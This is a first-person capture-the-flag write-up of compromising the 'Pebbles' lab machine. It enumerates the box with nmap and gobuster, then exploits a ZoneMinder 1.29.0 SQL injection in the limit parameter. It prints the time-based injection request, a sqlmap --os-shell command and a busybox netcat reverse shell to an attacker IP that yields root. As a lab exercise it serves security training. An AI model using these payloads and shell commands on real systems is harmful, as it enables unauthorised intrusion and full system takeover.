The "Pebbles" CTF provided valuable experience in identifying and exploiting SQL injection vulnerabilities. By leveraging tools like Nmap, Gobuster, and SQLMap, I was able to systematically enumerate the target, exploit the vulnerability, and land a root shell directly, because the database server on this box was running as root and no separate privilege escalation was needed. This exercise reinforced the importance of parameterised queries over string-built SQL, and of running database services under an unprivileged account.

Enumeration

Nmap Scan

To begin, I ran a full TCP port scan with service detection and default scripts (the -T5 timing is fast but can drop results on a lossy link; -T4 is the safer default):

nmap -sV -sC -p- -T5 192.168.162.52

Key Findings:

  • Port 21: FTP (vsftpd 3.0.3)

  • Port 22: SSH (OpenSSH 7.2p2 Ubuntu 4ubuntu2.8)

  • Port 80: HTTP (Apache httpd 2.4.18)

  • Port 3305: HTTP (Apache httpd 2.4.18)

  • Port 8080: HTTP (Apache httpd 2.4.18, hosting Tomcat and ZoneMinder)

Directory Enumeration

Using gobuster, I enumerated directories on port 8080 to discover potential entry points:

└─$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.162.52:8080
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.162.52:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 328] [--> http://192.168.162.52:8080/javascript/]
/zm                   (Status: 301) [Size: 320] [--> http://192.168.162.52:8080/zm/]
/server-status        (Status: 403) [Size: 281]

The /zm directory led to the ZoneMinder console, which was confirmed to be version 1.29.0.

Exploitation

SQL Injection Vulnerability

During testing, I identified an SQL injection vulnerability in the limit parameter of ZoneMinder's log query handler (view=request&request=log&task=query). The value is inserted into the SQL statement unchanged, so a second statement can be stacked after it. To confirm this without depending on error output, I sent the following POST request with a time-based payload:

POST /zm/index.php HTTP/1.1
Host: 192.168.162.52:8080
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/x-www-form-urlencoded

view=request&request=log&task=query&limit=100;SELECT(SLEEP(30))

This payload caused the server to pause for 30 seconds, confirming the presence of an SQL injection vulnerability. The useful signal is that the delay tracks the SLEEP() argument: a single slow response could just be a busy server, so re-run with a different delay (and with SLEEP(0) as a control) before concluding. A shorter delay such as 5 seconds, repeated a few times, is enough and avoids tying up the target.

Automating Exploitation with SQLMap

I saved the raw request to a file named req, then used SQLMap to automate the exploitation and obtain an OS shell:

sqlmap -r req --dbms=mysql --os-shell -p limit

Key Steps:

  1. SQLMap detected the vulnerability in the limit parameter.

  2. It wrote its lib_mysqludf_sys shared library into the MySQL plugin directory and registered the sys_exec and sys_eval user-defined functions, which run operating system commands as the mysqld process. This only works when the database account holds the FILE privilege, secure_file_priv does not block the write, and the plugin directory is writable.

  3. A Linux OS shell was successfully obtained. Because the commands run as the database process, whoami returning root (below) means mysqld itself was running as root.

Example Commands and Outputs:

os-shell> whoami
root

Establishing a Reverse Shell

The sqlmap os-shell is slow, since every command goes through a fresh injected query, so with root privileges in hand I upgraded to a reverse shell using the BusyBox netcat present on the target (port 80 is chosen for the callback because it is rarely blocked outbound):

os-shell> busybox nc 192.168.45.178 80 -e /bin/bash

On my local machine, I listened for incoming connections:

nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.178] from (UNKNOWN) [192.168.162.52] 59444
whoami
root